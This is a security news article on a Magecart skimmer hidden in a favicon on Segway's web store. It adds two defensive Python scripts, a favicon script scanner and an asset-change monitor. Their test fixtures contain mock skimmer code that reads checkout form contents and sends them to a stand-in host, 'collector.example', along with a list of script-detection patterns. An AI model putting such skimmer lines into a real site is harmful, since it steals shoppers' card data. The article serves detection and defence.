Segway, maker of the iconic – and much-spoofed – personal motorized transporter familiar from guided city tours everywhere, has been serving up a nasty credit-card harvesting skimmer via its website that’s likely linked to Magecart Group 12.
That’s according to Malwarebytes, which noted that “We already have informed Segway so that they can fix their site, but are publishing this blog now in order to raise awareness.” Segway, which is now owned by Chinese company Ninebot, did not immediately return a request for confirmation that the site is cleaned.
Magecart is a loose umbrella term for a number of affiliated, financially motivated cybercriminal groups that all use similar skimming code to harvest information – payment-card data above all – that shoppers type into the checkout pages of eCommerce websites. Magecart Group 12 is one of the more recently identified of these sub-groups, and one that is known for regularly switching up its tactics.
Typically, across Magecart groups, the skimmers are injected into unsuspecting merchant websites by exploiting vulnerable versions of popular eCommerce platforms, such as outdated iterations of Magento or WooCommerce. That’s what researchers believe may have happened here.
“While we do not know how Segway’s site was compromised, an attacker will usually target a vulnerability in the CMS itself or one of its plugins,” the team explained, in a Monday posting. “The hostname at store.segway[.]com is running Magento, the popular content management system (CMS) used by many eCommerce sites and also a favorite among Magecart threat actors.”
In terms of this campaign’s specific characteristics, Malwarebytes analysts estimated that the skimmer has been active since about Jan. 6, and that it has so far exposed victims in the United States (which makes up 55 percent of site visitors), Australia (39 percent), Canada (3 percent), the UK (2 percent) and Germany (1 percent).
“The compromise of the Segway store is a reminder that even well-known and trusted brands can be affected by Magecart attacks,” Malwarebytes noted. “While it usually is more difficult for threat actors to breach a large website, the payoff is well worth it.”
Hiding Inside a Favicon
Also of interest is the fact that the threat actors embedded the skimmer inside a favicon.ico file. Favicons are the small icon images a browser displays in its tab, address bar and bookmarks for a site, normally served from /favicon.ico. Every browser requests that file automatically, so traffic to it looks routine, and an image file is rarely the first place a reviewer goes looking for JavaScript.
Uriel Maimon, senior director of emerging technologies at cybersecurity company PerimeterX, noted that this type of innovation is becoming more common.
“Magecart attackers continue [to] get more creative with their techniques in order to evade detection, especially given advancements in security solutions over the years,” he said via email. “By hiding the skimmer script inside a favicon pretending to display the site’s copyright, neither manual code reviews, static code analysis or scanners could have detected this easily.”
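The point Maimon makes is that an image-named file is skipped by the tools that look for script. The check below is an added example written for this article, not Malwarebytes' or PerimeterX's tooling, and it does not reproduce the actual Segway payload: it takes the bytes served as a favicon, verifies that they carry a real icon structure (ICO directory entries that point inside the file, or a PNG/GIF signature), and then scans the whole byte stream for tokens a form-grabbing script cannot do without. The sample inputs, including the mock skimmer and the `collector.example` host, are constructed for the demonstration.

```python
import re
import struct

ICO_MAGIC = b"\x00\x00\x01\x00"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GIF_MAGIC = b"GIF8"

# Tokens a form-grabbing script needs that have no business inside an icon file.
SCRIPT_MARKERS = [
    rb"<script", rb"document\.", rb"addEventListener", rb"XMLHttpRequest",
    rb"\bfetch\s*\(", rb"\beval\s*\(", rb"\b(?:atob|btoa)\s*\(", rb"\bfunction\b",
    rb"new\s+Image\s*\(", rb"\.send\s*\(",
]


def detect_image_format(data):
    """Classify the leading bytes as 'ico', 'png', 'gif' or 'unknown'."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(GIF_MAGIC):
        return "gif"
    if data.startswith(ICO_MAGIC):
        return "ico"
    return "unknown"


def ico_structure_ok(data):
    """Parse the ICONDIR header and check that every ICONDIRENTRY points
    inside the file. A script with a four-byte ICO magic bolted on fails here."""
    if len(data) < 6:
        return False
    _reserved, _kind, count = struct.unpack_from("<HHH", data, 0)
    dir_end = 6 + 16 * count
    if count == 0 or len(data) < dir_end:
        return False
    for i in range(count):
        *_unused, size, offset = struct.unpack_from("<BBBBHHII", data, 6 + 16 * i)
        if size == 0 or offset < dir_end or offset + size > len(data):
            return False
    return True


def script_indicators(data):
    """Return the marker patterns found anywhere in the file, header or not."""
    return [pattern.decode() for pattern in SCRIPT_MARKERS if re.search(pattern, data)]


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII; real image data is mostly not."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data)


def audit_favicon(data):
    """Combine the three checks into one verdict for a served favicon."""
    fmt = detect_image_format(data)
    markers = script_indicators(data)
    ratio = printable_ratio(data)
    structure_ok = ico_structure_ok(data) if fmt == "ico" else fmt in ("png", "gif")
    return {
        "format": fmt,
        "structure_ok": structure_ok,
        "script_indicators": markers,
        "printable_ratio": round(ratio, 2),
        "suspicious": bool(markers) or not structure_ok or ratio > 0.9,
    }


# Constructed samples for the demonstration (not files from the Segway incident).
# 1) A structurally valid 1x1 ICO: header, one directory entry, 8 bytes of image data.
GOOD_ICO = (struct.pack("<HHH", 0, 1, 1)
            + struct.pack("<BBBBHHII", 1, 1, 0, 0, 1, 32, 8, 22)
            + b"\x00" * 8)
# 2) A mock skimmer served under the favicon name, fronted by a copyright banner.
MOCK_SKIMMER = (b"/* Copyright (c) Example Store. All rights reserved. */\n"
                b"document.addEventListener('submit', function (e) {\n"
                b"  var x = new XMLHttpRequest();\n"
                b"  x.open('POST', 'https://collector.example/', true);\n"
                b"  x.send(btoa(e.target.outerHTML));\n});\n")
# 3) The valid icon with the script appended: still renders as an icon.
HYBRID = GOOD_ICO + MOCK_SKIMMER

if __name__ == "__main__":
    for name, sample in (("good", GOOD_ICO), ("mock", MOCK_SKIMMER), ("hybrid", HYBRID)):
        print(name, audit_favicon(sample))
```

The third sample is the one worth keeping in mind: an icon that opens fine in any viewer, passes a content-type check, and still carries the script at the end, which is why the marker scan runs over the entire file rather than stopping at the header.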
Assume Magecart is Coming After Your eCommerce Site
The skimmer itself is a known quantity, researchers noted – it’s cropped up in campaigns since at least 2020, including those carried out by Magecart 12.
Further, the Magecart groups as a whole have been operating for several years and have skimmed many large organizations, stealing names, emails, credit-card information and more, all of which is sold on the Dark Web for profit. Their activity is prolific: a RiskIQ report published in December found that a Magecart attack on a website happens once every 16 minutes.
Because of all of that, eCommerce merchants should assume they’re being targeted, noted James McQuiggan, security awareness advocate at KnowBe4.
“In this situation, cybercriminals…have about sixteen lines of code injected into the application for credit-card processing,” McQuiggan said via email. “Organizations must monitor web traffic for applications sending data to unknown locations. A robust change-management program to monitor code changes to sites and third-party products can reduce the risk of a successful attack and maintain a solid cyber resiliency.”
E-commerce businesses could also use a real-time monitoring solution that detects access to sensitive fields and attempts to exfiltrate personally identifiable information from the client side, PerimeterX’s Maimon said.
“It is important that users of Magento understand the need to disrupt the web attack lifecycle by stopping the theft of account and identity information from their site, and implement a solution to help do that,” he explained. “Taking action before it is too late will also help prevent damage to the brand’s reputation as well as limit potential liability for non-compliance.”
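McQuiggan's two recommendations, watching for data sent to unknown destinations and tracking changes to what the site serves, can be turned into a scheduled check. The script below is an added example for this article, not a product or any vendor's code: it fingerprints each served asset with SHA-256, diffs the result against a baseline recorded at deploy time, and for every asset that is new or changed lists the hosts it references that are not on the store's allowlist. The asset paths, the `ALLOWED_HOSTS` set and the `collector.example` destination are all constructed for the demonstration.

```python
import hashlib
import re
from urllib.parse import urlparse

# Hosts the storefront is expected to contact from the browser.
# Assumed list for the example, not any real store's configuration.
ALLOWED_HOSTS = {"store.example", "cdn.example", "payments.example"}

# Absolute URLs: scheme plus host (and optional port); the path is not needed.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?", re.I)


def fingerprint(assets):
    """Map each served path to the SHA-256 of its bytes. Record this at
    deploy time as the baseline and recompute it on a schedule."""
    return {path: hashlib.sha256(body).hexdigest() for path, body in assets.items()}


def diff_baseline(baseline, current):
    """Report which paths appeared, disappeared or changed between two fingerprints."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def unknown_hosts(body, allowed=ALLOWED_HOSTS):
    """Hosts referenced by absolute URL in an asset that are not on the allowlist."""
    hosts = {urlparse(m.group(0).decode("ascii", "ignore")).hostname
             for m in URL_RE.finditer(body)}
    return sorted(h for h in hosts if h and h not in allowed)


def audit(baseline_assets, current_assets, allowed=ALLOWED_HOSTS):
    """Diff the deployed assets against the baseline and flag unknown destinations
    in anything that is new or modified."""
    changes = diff_baseline(fingerprint(baseline_assets), fingerprint(current_assets))
    findings = []
    for path in changes["added"] + changes["changed"]:
        findings.append({
            "path": path,
            "status": "added" if path in changes["added"] else "changed",
            "unknown_hosts": unknown_hosts(current_assets[path], allowed),
        })
    return {"changes": changes, "findings": findings}


# Constructed snapshots for the demonstration: the baseline taken at deploy time
# and a later crawl in which the favicon has grown a script tail and one new
# (harmless) bundle has appeared.
PLACEHOLDER_ICON = b"\x00\x00\x01\x00" + b"\x00" * 26
BASELINE = {
    "/favicon.ico": PLACEHOLDER_ICON,
    "/js/checkout.js": b"fetch('https://payments.example/charge', {method: 'POST'});",
}
CURRENT = {
    "/favicon.ico": PLACEHOLDER_ICON
                    + b"/* copyright */ new Image().src='https://collector.example/?d='"
                    + b"+btoa(document.forms[0].outerHTML);",
    "/js/checkout.js": BASELINE["/js/checkout.js"],
    "/js/vendor-new.js": b"// new build of a vendor bundle\nconsole.log('ok');",
}

if __name__ == "__main__":
    for finding in audit(BASELINE, CURRENT)["findings"]:
        print(finding)
```

A changed favicon that references a host outside the allowlist is exactly the pairing a change-management process should page on; a new bundle with no unfamiliar destinations is the kind of noise that a plain file-change alert would otherwise bury it in.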